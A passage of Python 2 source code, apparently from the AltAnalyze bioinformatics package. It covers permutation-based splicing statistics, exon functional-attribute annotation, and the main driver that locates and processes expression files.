            linregressP = statistics.runComparisonStatistic(group1_scores,group2_scores,probability_statistic)
        except Exception:
            linregressP = 0; group1_scores = [0]; group2_scores = [log_fold]
        if linregressP == 1: linregressP = 0
    except Exception:
        linregressP = 0; group1_scores = [0]; group2_scores = [log_fold]
    if export_NI_values == 'yes' and groups==2:
        group1_scores = stringListConvert(group1_scores)
        group2_scores = stringListConvert(group2_scores)
        ev = '\t'.join([probeset1,probeset2]+group1_scores+group2_scores)+'\n'; NIdata_export.write(ev)
    return log_fold, linregressP, rsqrd
def performLinearRegression(p1_g1,p2_g1,p1_g2,p2_g2):
    """Regress probeset2 on probeset1 within each group and return the log
    fold of the two slopes plus a 'proceed' status flag.

    The module-level use_R flag selects the RLM-based regression; otherwise a
    basic least-squares fit is used.
    """
    if use_R == 'yes': ###Uses the RLM algorithm
        return_rsqrd = 'no'
        baseline_slope = statistics.LinearRegression(p1_g1,p2_g1,return_rsqrd)
        experimental_slope = statistics.LinearRegression(p1_g2,p2_g2,return_rsqrd)
    else: ###Uses a basic least squared method
        baseline_slope = statistics.simpleLinRegress(p1_g1,p2_g1)
        experimental_slope = statistics.simpleLinRegress(p1_g2,p2_g2)
    log_fold = statistics.convert_to_log_fold(experimental_slope/baseline_slope)
    ### rsqrd-based gating is currently disabled; always proceed
    rsqrd = 'proceed'
    return log_fold, rsqrd
########### Permutation Analysis Functions ###########
def permuteLinearRegression(probeset1,probeset2,p):
    """Linear-regression log fold for one permutation p of the sample labels.

    p is a pair of index lists (see permute_samples); expression values come
    from the module-level array_raw_group_values.
    """
    group1_p1, group2_p1 = permute_samples(array_raw_group_values[probeset1],p)
    group1_p2, group2_p2 = permute_samples(array_raw_group_values[probeset2],p)
    if use_R == 'yes': ###Uses the RLM algorithm
        return_rsqrd = 'no'
        g1_slope = statistics.LinearRegression(group1_p1,group1_p2,return_rsqrd)
        g2_slope = statistics.LinearRegression(group2_p1,group2_p2,return_rsqrd)
    else: ###Uses a basic least squared method
        g1_slope = statistics.simpleLinRegress(group1_p1,group1_p2)
        g2_slope = statistics.simpleLinRegress(group2_p1,group2_p2)
    return statistics.convert_to_log_fold(g2_slope/g1_slope)
def permuteSplicingScores(splice_event_list):
    """Permutation analysis of splice scores.

    For every scored event, recompute the score under each sample-label
    permutation in the module-level permute_lists and derive an empirical
    p-value from the permuted distribution. For linearregres, events failing
    the permutation threshold are removed. Returns (splice_event_list,
    p_value_call, permute_p_values).
    """
    p_value_call = 'lowest_raw_p'
    permute_p_values = {}; splice_event_list2=[]
    if len(permute_lists) > 0:
        #tuple_data in splice_event_list = dI,probeset1,probeset2,y,event_call,critical_exon_list
        all_samples = []; a = 0
        for (score,x) in splice_event_list:
            ###NOTE: This reference dI differs slightly from the below calculated, since the values are calculated from raw relative ratios rather than the avg
            ###Solution: Use the first calculated dI as the reference
            score = score*(-1) ### Reverse the score to make equivalent to splicing-index and FIRMA scores
            ref_splice_val = score; probeset1 = x.Probeset1(); probeset2 = x.Probeset2(); affygene = x.GeneID()
            y = 0; p_splice_val_dist = []; count = 0; return_rsqrd = 'no'
            for p in permute_lists: ###There are two lists in each entry
                count += 1
                permute = 'yes'
                if analysis_method == 'ASPIRE':
                    p_splice_val = permute_ASPIRE_filtered(affygene, probeset1,probeset2,p,y,ref_splice_val,x)
                elif analysis_method == 'linearregres':
                    slope_ratio = permuteLinearRegression(probeset1,probeset2,p)
                    p_splice_val = slope_ratio
                if p_splice_val != 'null': p_splice_val_dist.append(p_splice_val)
                y+=1
            p_splice_val_dist.sort()
            new_ref_splice_val = str(abs(ref_splice_val)); new_ref_splice_val = float(new_ref_splice_val[0:8]) #otherwise won't match up the scores correctly
            if analysis_method == 'linearregres':
                ### Flip a negative reference's distribution so comparisons stay one-sided
                if ref_splice_val<0:
                    p_splice_val_dist2=[]
                    for val in p_splice_val_dist: p_splice_val_dist2.append(-1*val)
                    p_splice_val_dist=p_splice_val_dist2; p_splice_val_dist.reverse()
            p_val, pos_permute, total_permute, greater_than_true_permute = statistics.permute_p(p_splice_val_dist,new_ref_splice_val,len(permute_lists))
            #print p_val,ref_splice_val, pos_permute, total_permute, greater_than_true_permute,p_splice_val_dist[-3:];kill
            ###When two groups are of equal size, there will be 2 pos_permutes rather than 1
            if len(permute_lists[0][0]) == len(permute_lists[0][1]): greater_than_true_permute = (pos_permute/2) - 1 #size of the two groups are equal
            else:greater_than_true_permute = (pos_permute) - 1
            if analysis_method == 'linearregres': greater_than_true_permute = (pos_permute) - 1 ###since this is a one sided test, unlike ASPIRE
            ###Below equation is fine if the population is large
            permute_p_values[(probeset1,probeset2)] = [p_val, pos_permute, total_permute, greater_than_true_permute]
            ###Remove non-significant linear regression results
            if analysis_method == 'linearregres':
                if p_val <= permute_p_threshold or greater_than_true_permute < 2: splice_event_list2.append((score,x)) ###<= since many p=0.05
        print "Number of permutation p filtered splice event:",len(splice_event_list2)
    if len(permute_p_values)>0: p_value_call = 'permuted_aspire_p-value'
    if analysis_method == 'linearregres': splice_event_list = splice_event_list2
    return splice_event_list, p_value_call, permute_p_values
def permute_ASPIRE_filtered(affygene,probeset1,probeset2,p,y,ref_splice_val,x):
    """ASPIRE score for one permutation p of the sample labels.

    Averages each permuted group for both probesets and for the gene's
    constitutive expression, then scores the constitutive-normalized ratios.
    The bare 'kill' names are deliberate NameError aborts used after printing
    diagnostics. Returns the absolute permuted ASPIRE score (0 on failure).
    """
    ### Get raw expression values for each permuted group for the two probesets
    b1,e1 = permute_dI(array_raw_group_values[probeset1],p)
    try: b2,e2 = permute_dI(array_raw_group_values[probeset2],p)
    except IndexError: print probeset2, array_raw_group_values[probeset2],p; kill
    ### Get the average constitutive expression values (averaged per-sample across probesets) for each permuted group
    try: bc,ec = permute_dI(avg_const_exp_db[affygene],p)
    except IndexError: print affygene, avg_const_exp_db[affygene],p; kill
    if factor_out_expression_changes == 'no':
        ec = bc
    ### Analyze the averaged ratio's of junction expression relative to permuted constitutive expression
    try: p_splice_val = abs(statistics.aspire_stringent(b1/bc,e1/ec,b2/bc,e2/ec)) ### This the permuted ASPIRE score
    except Exception: p_splice_val = 0
    #print p_splice_val, ref_splice_val, probeset1, probeset2, affygene; dog
    if y == 0: ###The first permutation is always the real one
        ### Grab the absolute number with small number of decimal places
        try:
            new_ref_splice_val = str(p_splice_val); new_ref_splice_val = float(new_ref_splice_val[0:8])
            ref_splice_val = str(abs(ref_splice_val)); ref_splice_val = float(ref_splice_val[0:8]); y += 1
        except ValueError:
            ###Only get this error if your ref_splice_val is a null
            print y, probeset1, probeset2; print ref_splice_val, new_ref_splice_val, p
            print b1/bc,e1/ec,b2/bc,e2/ec; print (b1/bc)/(e1/ec), (b2/bc)/(e2/ec)
            print x[7],x[8],x[9],x[10]; kill
    return p_splice_val
def permute_samples(a,p):
    """Split per-sample values into permuted baseline/experimental groups.

    a: sequence of per-sample expression values for one probeset or gene.
    p: two-item container of sample-index lists - p[0] selects the permuted
       baseline samples, p[1] the permuted experimental samples.
    Returns (baseline_values, experimental_values) as two lists, preserving
    the order of the indices in p.
    Raises IndexError if any index in p is out of range for a.
    """
    ### Comprehensions replace the manual append loops (same order and content)
    baseline = [a[p_index] for p_index in p[0]]
    experimental = [a[p_index] for p_index in p[1]]
    return baseline, experimental
def permute_dI(all_samples,p):
    """Average each permuted sample group and convert from log2 to fold space.

    all_samples: per-sample (log2) expression values for one probeset/gene.
    p: permutation - a pair of sample-index lists (baseline, experimental).
    Returns (baseline_mean, experimental_mean) after converting each group's
    log2 average back to non-log fold space via the project statistics module.
    """
    grouped = permute_samples(all_samples,p)
    ### Average each group, then convert the log2 mean to a non-log fraction
    group_means = [statistics.avg(values) for values in grouped]
    non_log = [statistics.log_fold_conversion_fraction(mean) for mean in group_means]
    return non_log[0], non_log[1]
def format_exon_functional_attributes(affygene,critical_probeset_list,functional_attribute_db,up_exon_list,down_exon_list,protein_length_list):
    """Direction-annotate the functional attributes of one splicing event.

    For each critical exon of the event, each functional attribute is
    prefixed with '(+)', '(-)' or '(~)' depending on whether the exon is
    up- or down-regulated and on the attribute's own call ('+', '-', '~').
    Protein-length pairs parsed from 'AA:' attributes are appended to
    protein_length_list (mutated in place and also returned).

    Returns a 4-tuple:
      new_functional_attribute_str - comma-joined non-sequence attributes
      functional_attribute_list2   - deduplication source of (attribute, exon) tuples
      new_seq_attribute_str        - comma-joined sequence attributes
      protein_length_list          - input list plus any new [val1, val2] pairs

    NOTE(review): relies on module globals array_type, explicit_data_type,
    analysis_method, regulated_exon_junction_db, exon_db and
    exclude_protein_details; 'kill' is an intentional NameError abort.
    """
    ### Add functional attributes
    functional_attribute_list2=[]
    new_functional_attribute_str=''
    new_seq_attribute_str=''
    new_functional_attribute_list=[]
    ### Exon/gene arrays key the db by a single probeset; junction arrays by the probeset tuple
    if array_type == 'exon' or array_type == 'gene' or explicit_data_type != 'null': critical_probesets = critical_probeset_list[0]
    else: critical_probesets = tuple(critical_probeset_list)
    key = affygene,critical_probesets
    if key in functional_attribute_db:
        ###Grab exon IDs corresponding to the critical probesets
        if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method:
            try: critical_exons = regulated_exon_junction_db[critical_probesets].CriticalExons() ###For junction arrays
            except Exception: print key, functional_attribute_db[key];kill
        else: critical_exons = [exon_db[critical_probesets].ExonID()] ###For exon arrays
        for exon in critical_exons:
            for entry in functional_attribute_db[key]:
                x = 0 ### x == 1 flags protein-detail attributes ('AA:' or 'ref'), which may be excluded below
                functional_attribute = entry[0]
                call = entry[1] # +, -, or ~
                if ('AA:' in functional_attribute) or ('ref' in functional_attribute):
                    x = 1
                if exon in up_exon_list:
                    ### design logic to determine whether up or down regulation promotes the functional change (e.g. NMD)
                    if 'ref' in functional_attribute:
                        new_functional_attribute = '(~)'+functional_attribute
                        data_tuple = new_functional_attribute,exon
                    elif call == '+' or call == '~':
                        new_functional_attribute = '(+)'+functional_attribute
                        data_tuple = new_functional_attribute,exon
                    elif call == '-':
                        new_functional_attribute = '(-)'+functional_attribute
                        data_tuple = new_functional_attribute,exon
                    ### 'AA:val1(...)->val2(...)' encodes a protein length change; order depends on call direction
                    if 'AA:' in functional_attribute and '?' not in functional_attribute:
                        functional_attribute_temp = functional_attribute[3:]
                        if call == '+' or call == '~':
                            val1,val2 = string.split(functional_attribute_temp,'->')
                        else:
                            val2,val1 = string.split(functional_attribute_temp,'->')
                        val1,null = string.split(val1,'(')
                        val2,null = string.split(val2,'(')
                        protein_length_list.append([val1,val2])
                elif exon in down_exon_list:
                    ### Mirror of the up-regulated branch with '+'/'-' prefixes (and AA value order) swapped
                    if 'ref' in functional_attribute:
                        new_functional_attribute = '(~)'+functional_attribute
                        data_tuple = new_functional_attribute,exon
                    elif call == '+' or call == '~':
                        new_functional_attribute = '(-)'+functional_attribute
                        data_tuple = new_functional_attribute,exon
                    elif call == '-':
                        new_functional_attribute = '(+)'+functional_attribute
                        data_tuple = new_functional_attribute,exon
                    if 'AA:' in functional_attribute and '?' not in functional_attribute:
                        functional_attribute_temp = functional_attribute[3:]
                        if call == '+' or call == '~':
                            val2,val1 = string.split(functional_attribute_temp,'->')
                        else:
                            val1,val2 = string.split(functional_attribute_temp,'->')
                        val1,null = string.split(val1,'(')
                        val2,null = string.split(val2,'(')
                        protein_length_list.append([val1,val2])
                if x == 0 or (exclude_protein_details != 'yes'):
                    ### new_functional_attribute may be unbound if the exon was in neither list - treated as a fatal inconsistency
                    try: new_functional_attribute_list.append(new_functional_attribute)
                    except UnboundLocalError:
                        print entry
                        print up_exon_list,down_exon_list
                        print exon, critical_exons
                        print critical_probesets, (key, affygene,critical_probesets)
                        for i in functional_attribute_db:
                            print i, functional_attribute_db[i]; kill
                ###remove protein sequence prediction_data
                if 'sequence' not in data_tuple[0]:
                    if x == 0 or exclude_protein_details == 'no':
                        functional_attribute_list2.append(data_tuple)
    ###Get rid of duplicates, but maintain non-alphabetical order
    new_functional_attribute_list2=[]
    for entry in new_functional_attribute_list:
        if entry not in new_functional_attribute_list2:
            new_functional_attribute_list2.append(entry)
    new_functional_attribute_list = new_functional_attribute_list2
    #new_functional_attribute_list = unique.unique(new_functional_attribute_list)
    #new_functional_attribute_list.sort()
    ### Split sequence vs. non-sequence attributes into two comma-joined strings
    for entry in new_functional_attribute_list:
        if 'sequence' in entry: new_seq_attribute_str = new_seq_attribute_str + entry + ','
        else: new_functional_attribute_str = new_functional_attribute_str + entry + ','
    new_seq_attribute_str = new_seq_attribute_str[0:-1]
    new_functional_attribute_str = new_functional_attribute_str[0:-1]
    return new_functional_attribute_str, functional_attribute_list2, new_seq_attribute_str,protein_length_list
def grab_summary_dataset_annotations(functional_attribute_db,comparison_db,include_truncation_results_specifically):
    """Tally functional annotations per gene for the summary report.

    functional_attribute_db / comparison_db: dicts keyed by (affygene,
    annotation) tuples. Genes whose comparison annotations mention
    truncation/fragment/NMD events are excluded from the primary tally;
    if include_truncation_results_specifically == 'yes' those genes
    contribute their truncation annotations instead. Annotations
    containing 'micro' are always omitted from the output.

    Returns (annotation_list, annotation_list_ranked) where the first is
    [(annotation, count), ...] and the second the same pairs reversed and
    sorted descending by count.
    """
    ### Index gene IDs for efficient lookup below
    gene_to_attributes = {}
    for (affygene, annotation) in functional_attribute_db:
        gene_to_attributes.setdefault(affygene, []).append(annotation)
    gene_to_comparisons = {}
    for (affygene, annotation) in comparison_db:
        gene_to_comparisons.setdefault(affygene, []).append(annotation)
    ### Collect genes flagged as truncated/fragment/NMD in the comparison db
    functional_attribute_db_exclude = {}
    for affygene in gene_to_attributes:
        for annotation2 in gene_to_comparisons.get(affygene, []):
            if ('trunc' in annotation2) or ('frag' in annotation2) or ('NMDs' in annotation2):
                functional_attribute_db_exclude.setdefault(affygene, []).append(annotation2)
    ### Count annotations, honoring the exclusion / truncation-inclusion policy
    functional_annotation_db = {}
    for (affygene, annotation) in functional_attribute_db:
        if affygene not in functional_attribute_db_exclude:
            functional_annotation_db[annotation] = functional_annotation_db.get(annotation, 0) + 1
        elif include_truncation_results_specifically == 'yes':
            for annotation_val in functional_attribute_db_exclude[affygene]:
                functional_annotation_db[annotation_val] = functional_annotation_db.get(annotation_val, 0) + 1
    annotation_list = []
    annotation_list_ranked = []
    for annotation in functional_annotation_db:
        if 'micro' not in annotation:
            occurrences = functional_annotation_db[annotation]
            annotation_list.append((annotation, occurrences))
            annotation_list_ranked.append((occurrences, annotation))
    ### sort ascending then reverse (kept as two steps to preserve tie ordering)
    annotation_list_ranked.sort(); annotation_list_ranked.reverse()
    return annotation_list, annotation_list_ranked
def reorganize_attribute_entries(attribute_db1,build_attribute_direction_databases):
    """Re-key attribute data by gene and optionally split by direction.

    attribute_db1: dict keyed by (affygene, exon_attribute) with exon lists
    as values, where exon_attribute looks like '(+)name' / '(-)name' / '(~)name'.
    Builds attribute_db2: affygene -> [(exon_attribute, sorted_unique_exons), ...].
    If build_attribute_direction_databases == 'yes', also builds per-direction
    hit-count databases for over-representation analysis and returns the
    5-tuple (attribute_db2, inclusion_hits, genes_with_inclusion,
    exclusion_hits, genes_with_exclusion); otherwise returns attribute_db2 only.

    NOTE(review): uses the project 'unique' module and the sibling
    eliminate_redundant_dict_values helper.
    """
    attribute_db2 = {}; inclusion_attributes_hit_count={}; exclusion_attributes_hit_count={}
    genes_with_inclusion_attributes={}; genes_with_exclusion_attributes={};
    ###This database has unique gene, attribute information.  No attribute will now be represented more than once per gene
    for key in attribute_db1:
        ###Make gene the key and attribute (functional elements or protein information), along with the associated exons the values
        affygene = key[0];exon_attribute = key[1];exon_list = attribute_db1[key]
        exon_list = unique.unique(exon_list);exon_list.sort()
        attribute_exon_info = exon_attribute,exon_list #e.g. 5'UTR, [E1,E2,E3]
        try: attribute_db2[affygene].append(attribute_exon_info)
        except KeyError: attribute_db2[affygene] = [attribute_exon_info]
        ###Separate out attribute data by direction for over-representation analysis
        if build_attribute_direction_databases == 'yes':
            ### '(+)name' -> direction '+', unique_gene_attribute 'name'
            direction=exon_attribute[1:2];unique_gene_attribute=exon_attribute[3:]
            if direction == '+':
                try: inclusion_attributes_hit_count[unique_gene_attribute].append(affygene)
                except KeyError: inclusion_attributes_hit_count[unique_gene_attribute] = [affygene]
                genes_with_inclusion_attributes[affygene]=[]
            if direction == '-':
                try: exclusion_attributes_hit_count[unique_gene_attribute].append(affygene)
                except KeyError: exclusion_attributes_hit_count[unique_gene_attribute] = [affygene]
                genes_with_exclusion_attributes[affygene]=[]
    ### De-duplicate gene lists so each gene is counted once per attribute
    inclusion_attributes_hit_count = eliminate_redundant_dict_values(inclusion_attributes_hit_count)
    exclusion_attributes_hit_count = eliminate_redundant_dict_values(exclusion_attributes_hit_count)
    """for key in inclusion_attributes_hit_count:
        inclusion_attributes_hit_count[key] = len(inclusion_attributes_hit_count[key])
    for key in exclusion_attributes_hit_count:
        exclusion_attributes_hit_count[key] = len(exclusion_attributes_hit_count[key])"""
    if build_attribute_direction_databases == 'yes': return attribute_db2,inclusion_attributes_hit_count,genes_with_inclusion_attributes,exclusion_attributes_hit_count,genes_with_exclusion_attributes
    else: return attribute_db2
########### Misc. Functions ###########
def eliminate_redundant_dict_values(database):
    """Return a copy of database with every value list de-duplicated and sorted.

    database: dict mapping keys to lists of values.
    Returns a new dict with the same keys; each value is the unique, sorted
    version of the original list (uses the project 'unique' module, which
    returns a list, so .sort() operates in place).
    """
    db1={}
    for key in database:
        ### renamed from 'list' to avoid shadowing the builtin
        values = unique.unique(database[key])
        values.sort()
        db1[key] = values
    return db1
def add_a_space(string):
    """Return the input string, substituting a single space if it is empty.

    Used to keep tab-delimited output columns from collapsing when a field
    has no content.
    """
    if len(string) < 1:
        return ' '
    return string
def convertToLog2(data_list):
    """Map each value in data_list (numbers or numeric strings) to log base 2."""
    def _to_log2(value):
        return math.log(float(value), 2)
    return map(_to_log2, data_list)
def addGlobalFudgeFactor(data_list,data_type):
    """Add the module-level global_addition_factor to every value in data_list.

    data_type == 'log': values are treated as log2, converted to non-log
    space first, offset, then converted back to log2. Any other data_type:
    the offset is added directly.
    Returns a new list; data_list is not modified.
    NOTE(review): depends on module globals global_addition_factor and the
    project 'statistics' module, plus the sibling convertToLog2 helper.
    """
    new_list = []
    if data_type == 'log':
        for item in data_list:
            ### convert out of log space, offset, then convert back below
            new_item = statistics.log_fold_conversion_fraction(item)
            new_list.append(float(new_item) + global_addition_factor)
        new_list = convertToLog2(new_list)
    else:
        for item in data_list: new_list.append(float(item) + global_addition_factor)
    return new_list
def copyDirectoryPDFs(root_dir,AS='AS'):
    """Copy the bundled DirectoryDescription help PDFs into the results tree.

    root_dir: output directory root the PDFs are copied into (each entry in
    'directories' is the destination path relative to root_dir).
    AS: analysis type; 'AltResult' PDFs are only copied for splicing ('AS') runs.
    Copy failures are silently ignored - these files are documentation only.
    """
    directories = ['AltResults/AlternativeOutputDirectoryDescription.pdf',
                   'AltResultsDirectoryDescription.pdf',
                   'ClusteringDirectoryDescription.pdf',
                   'ExpressionInputDirectoryDescription.pdf',
                   'ExpressionOutputDirectoryDescription.pdf',
                   'GO-Elite/GO-Elite_resultsDirectoryDescription.pdf',
                   'GO-EliteDirectoryDescription.pdf',
                   'RootDirectoryDescription.pdf']
    import shutil
    for dir in directories:
        ### source filename is the basename of the destination path
        file = string.split(dir,'/')[-1]
        proceed=True
        if 'AltResult' in dir and AS!='AS': proceed=False
        if proceed:
            try: shutil.copyfile(filepath('Documentation/DirectoryDescription/'+file), filepath(root_dir+dir))
            except Exception: pass
def restrictProbesets(dataset_name):
    """Import an optional probeset/junction filter list matching dataset_name.

    Looks in AltDatabaseNoVersion/filtering for a file whose name (minus
    extension) is contained in dataset_name; if found, imports it as the
    restriction database. Returns a dict of IDs to restrict the splicing
    analysis to (empty dict when no filter file applies).
    NOTE(review): depends on module globals array_type, read_directory,
    filepath and importGeneric.
    """
    ### Take a file with probesets and only perform the splicing-analysis on these (e.g. those already identified from a previous run with a specific pattern)
    ### Allows for propper denominator when calculating z-scores for microRNA and protein-domain ORA
    probeset_list_filename = import_dir = '/AltDatabaseNoVersion/filtering'; filtered_probeset_db={}
    if array_type == 'RNASeq': id_name = 'exon/junction IDs'
    else: id_name = 'array IDs'
    try:
        dir_list = read_directory(import_dir)
        fn_dir = filepath(import_dir[1:])
    except Exception: dir_list=[]; fn_dir=''
    if len(dir_list)>0:
        for file in dir_list:
            if file[:-4] in dataset_name:
                fn = fn_dir+'/'+file; fn = string.replace(fn,'AltDatabase','AltDatabaseNoVersion')
                filtered_probeset_db = importGeneric(fn)
                print len(filtered_probeset_db), id_name,"will be used to restrict analysis..."
    return filtered_probeset_db
def RunAltAnalyze():
    """Main driver for the alternative-exon analysis.

    Locates the AltExpression input directory for the configured array type,
    imports gene/probeset annotations, then runs the splicing analysis
    (splicingAnalysisAlgorithms) on every qualifying expression file found.
    Returns (summary_results_db, aspire_output_gene_list,
    number_events_analyzed) when at least one file was analyzed, else None.

    NOTE(review): driven almost entirely by module globals (array_type,
    species, root_dir, analysis_method, run_from_scratch,
    analyze_all_conditions, altanalyze_files, probeset_annotations_file,
    aspire_output_list, aspire_output_gene_list, ...) and mutates several
    of them; errors surface through UI.WarningWindow + badExit().
    """
    #print altanalyze_files
    #print '!!!!!starting to run alt-exon analysis'
    #returnLargeGlobalVars()
    global annotate_db; annotate_db={}; global splice_event_list; splice_event_list=[]; residuals_dirlist=[]
    global dataset_name; global constitutive_probeset_db; global exon_db; dir_list2=[]; import_dir2=''
    ### Resolve the AltExpression input directory for this platform
    if array_type == 'AltMouse': import_dir = root_dir+'AltExpression/'+array_type
    elif array_type == 'exon':
        import_dir = root_dir+'AltExpression/ExonArray/'+species+'/'
    elif array_type == 'gene':
        import_dir = root_dir+'AltExpression/GeneArray/'+species+'/'
    elif array_type == 'junction':
        import_dir = root_dir+'AltExpression/JunctionArray/'+species+'/'
    else:
        import_dir = root_dir+'AltExpression/'+array_type+'/'+species+'/'
    #if analysis_method == 'ASPIRE' or analysis_method == 'linearregres' or analysis_method == 'splicing-index':
    if array_type != 'AltMouse': gene_annotation_file = "AltDatabase/ensembl/"+species+"/"+species+"_Ensembl-annotations.txt"
    else: gene_annotation_file = "AltDatabase/"+species+"/"+array_type+"/"+array_type+"_gene_annotations.txt"
    annotate_db = ExonAnalyze_module.import_annotations(gene_annotation_file,array_type)
    ###Import probe-level associations
    exon_db={}; filtered_arrayids={};filter_status='no'
    try: constitutive_probeset_db,exon_db,genes_being_analyzed = importSplicingAnnotationDatabase(probeset_annotations_file,array_type,filtered_arrayids,filter_status)
    except IOError:
        print_out = 'The annotation database: \n'+probeset_annotations_file+'\nwas not found. Ensure this file was not deleted and that the correct species has been selected.'
        try: UI.WarningWindow(print_out,'Exit'); print print_out
        except Exception: print print_out
        print traceback.format_exc()
        badExit()
    run=0
    ### Occurs when analyzing multiple conditions rather than performing a simple pair-wise comparison
    if run_from_scratch == 'Annotate External Results': import_dir = root_dir
    elif analyze_all_conditions == 'all groups':
        import_dir = string.replace(import_dir,'AltExpression','AltExpression/FullDatasets')
        if array_type == 'AltMouse':
            import_dir = string.replace(import_dir,'FullDatasets/AltMouse','FullDatasets/AltMouse/Mm')
    elif analyze_all_conditions == 'both':
        ### 'both' adds a second (FullDatasets) input directory alongside the pairwise one
        import_dir2 = string.replace(import_dir,'AltExpression','AltExpression/FullDatasets')
        if array_type == 'AltMouse':
            import_dir2 = string.replace(import_dir2,'FullDatasets/AltMouse','FullDatasets/AltMouse/Mm')
        try: dir_list2 = read_directory(import_dir2) #send a sub_directory to a function to identify all files in a directory
        except Exception:
            try:
                ### Fall back to the stripped directory layout if the versioned path is missing
                if array_type == 'exon': array_type_dir = 'ExonArray'
                elif array_type == 'gene': array_type_dir = 'GeneArray'
                elif array_type == 'junction': array_type_dir = 'GeneArray'
                else: array_type_dir = array_type
                import_dir2 = string.replace(import_dir2,'AltExpression/'+array_type_dir+'/'+species+'/','')
                import_dir2 = string.replace(import_dir2,'AltExpression/'+array_type_dir+'/','');
                dir_list2 = read_directory(import_dir2)
            except Exception:
                print_out = 'The expression files were not found. Please make\nsure you selected the correct species and array type.\n\nselected species: '+species+'\nselected array type: '+array_type+'\nselected directory:'+import_dir2
                try: UI.WarningWindow(print_out,'Exit'); print print_out
                except Exception: print print_out
                print traceback.format_exc()
                badExit()
    try: dir_list = read_directory(import_dir) #send a sub_directory to a function to identify all files in a directory
    except Exception:
        try:
            ### Same fallback strategy as above for the primary input directory
            if array_type == 'exon': array_type_dir = 'ExonArray'
            elif array_type == 'gene': array_type_dir = 'GeneArray'
            elif array_type == 'junction': array_type_dir = 'JunctionArray'
            else: array_type_dir = array_type
            import_dir = string.replace(import_dir,'AltExpression/'+array_type_dir+'/'+species+'/','')
            import_dir = string.replace(import_dir,'AltExpression/'+array_type_dir+'/','');
            try: dir_list = read_directory(import_dir)
            except Exception:
                import_dir = root_dir
                dir_list = read_directory(root_dir) ### Occurs when reading in an AltAnalyze filtered file under certain conditions
        except Exception:
            print_out = 'The expression files were not found. Please make\nsure you selected the correct species and array type.\n\nselected species: '+species+'\nselected array type: '+array_type+'\nselected directory:'+import_dir
            try: UI.WarningWindow(print_out,'Exit')
            except Exception: print print_out
            print traceback.format_exc()
            badExit()
    dir_list+=dir_list2
    ### Capture the corresponding files in the residual dir to make sure these files exist for all comparisons - won't if FIRMA was run on some files
    if analysis_method == 'FIRMA':
        try:
            residual_dir = root_dir+'AltExpression/FIRMA/residuals/'+array_type+'/'+species+'/'
            residuals_dirlist = read_directory(residual_dir)
        except Exception: null=[]
        try:
            residual_dir = root_dir+'AltExpression/FIRMA/FullDatasets/'+array_type+'/'+species+'/'
            residuals_dirlist += read_directory(residual_dir)
        except Exception: null=[]
        dir_list_verified=[]
        for file in residuals_dirlist:
            for filename in dir_list:
                if file[:-4] in filename: dir_list_verified.append(filename)
        dir_list = unique.unique(dir_list_verified)
    junction_biotype = 'no'
    if array_type == 'RNASeq':
        ### Check to see if user data includes junctions or just exons
        for probeset in exon_db:
            if '-' in probeset: junction_biotype = 'yes'; break
    if junction_biotype == 'no' and analysis_method != 'splicing-index' and array_type == 'RNASeq':
        dir_list=[] ### DON'T RUN ALTANALYZE WHEN JUST ANALYZING EXON DATA
        print 'No junction data to summarize... proceeding with exon analysis\n'
    elif len(dir_list)==0:
        print_out = 'No expression files available in the input directory:\n'+root_dir
        try: UI.WarningWindow(print_out,'Exit'); print print_out
        except Exception: print print_out
        badExit()
    dir_list = filterAltExpressionFiles(dir_list,altanalyze_files) ### Looks to see if the AltExpression files are for this run or from an older run
    for altanalyze_input in dir_list:    #loop through each file in the directory to output results
        ###Import probe-level associations
        if 'cel_files' in altanalyze_input:
            print_out = 'The AltExpression directory containing the necessary import file(s) is missing. Please verify the correct parameters and input directory were selected. If this error persists, contact us.'
            try: UI.WarningWindow(print_out,'Exit'); print print_out
            except Exception: print print_out
            badExit()
        if run>0: ### Only re-set these databases after the run when batch analysing multiple files
            exon_db={}; filtered_arrayids={};filter_status='no' ###Use this as a means to save memory (import multiple times - only storing different types relevant information)
            constitutive_probeset_db,exon_db,genes_being_analyzed = importSplicingAnnotationDatabase(probeset_annotations_file,array_type,filtered_arrayids,filter_status)
        if altanalyze_input in dir_list2: dataset_dir = import_dir2 +'/'+ altanalyze_input ### Then not a pairwise comparison
        else: dataset_dir = import_dir +'/'+ altanalyze_input
        dataset_name = altanalyze_input[:-4] + '-'
        print "Beginning to process",dataset_name[0:-1]
        ### If the user want's to restrict the analysis to preselected probesets (e.g., limma or FIRMA analysis selected)
        global filtered_probeset_db; filtered_probeset_db={}
        try: filtered_probeset_db = restrictProbesets(dataset_name)
        except Exception: null=[]
        if run_from_scratch != 'Annotate External Results':
            ###Import expression data and stats and filter the expression data based on fold and p-value OR expression threshold
            try: conditions,adj_fold_dbase,nonlog_NI_db,dataset_name,gene_expression_diff_db,midas_db,ex_db,si_db = performExpressionAnalysis(dataset_dir,constitutive_probeset_db,exon_db,annotate_db,dataset_name)
            except IOError:
                #except Exception,exception:
                #print exception
                print traceback.format_exc()
                print_out = 'The AltAnalyze filtered expression file "'+dataset_name+'" is not propperly formatted. Review formatting requirements if this file was created by another application.'
                try: UI.WarningWindow(print_out,'Exit'); print print_out
                except Exception: print print_out
                badExit()
        else:
            ### Annotate-only mode: no expression import, so seed empty databases
            conditions = 0; adj_fold_dbase={}; nonlog_NI_db={}; gene_expression_diff_db={}; ex_db={}; si_db={}
            defineEmptyExpressionVars(exon_db); adj_fold_dbase = original_fold_dbase
        ###Run Analysis
        summary_results_db, summary_results_db2, aspire_output, aspire_output_gene, number_events_analyzed = splicingAnalysisAlgorithms(nonlog_NI_db,adj_fold_dbase,dataset_name,gene_expression_diff_db,exon_db,ex_db,si_db,dataset_dir)
        aspire_output_list.append(aspire_output); aspire_output_gene_list.append(aspire_output_gene)
        ### Free the large per-comparison databases before the next iteration
        try: clearObjectsFromMemory(exon_db); clearObjectsFromMemory(constitutive_probeset_db); constitutive_probeset_db=[]
        except Exception: null=[]
        try: clearObjectsFromMemory(last_exon_region_db);last_exon_region_db=[]
        except Exception: null=[]
        try: clearObjectsFromMemory(adj_fold_dbase);adj_fold_dbase=[]; clearObjectsFromMemory(nonlog_NI_db);nonlog_NI_db=[]
        except Exception: null=[]
        try: clearObjectsFromMemory(gene_expression_diff_db);gene_expression_diff_db=[]; clearObjectsFromMemory(midas_db);midas_db=[]
        except Exception: null=[]
        try: clearObjectsFromMemory(ex_db);ex_db=[]; clearObjectsFromMemory(si_db);si_db=[]
        except Exception: null=[]
        try: run+=1
        except Exception: run = 1
    if run>0: ###run = 0 if no filtered expression data present
        try: return summary_results_db, aspire_output_gene_list, number_events_analyzed
        except Exception:
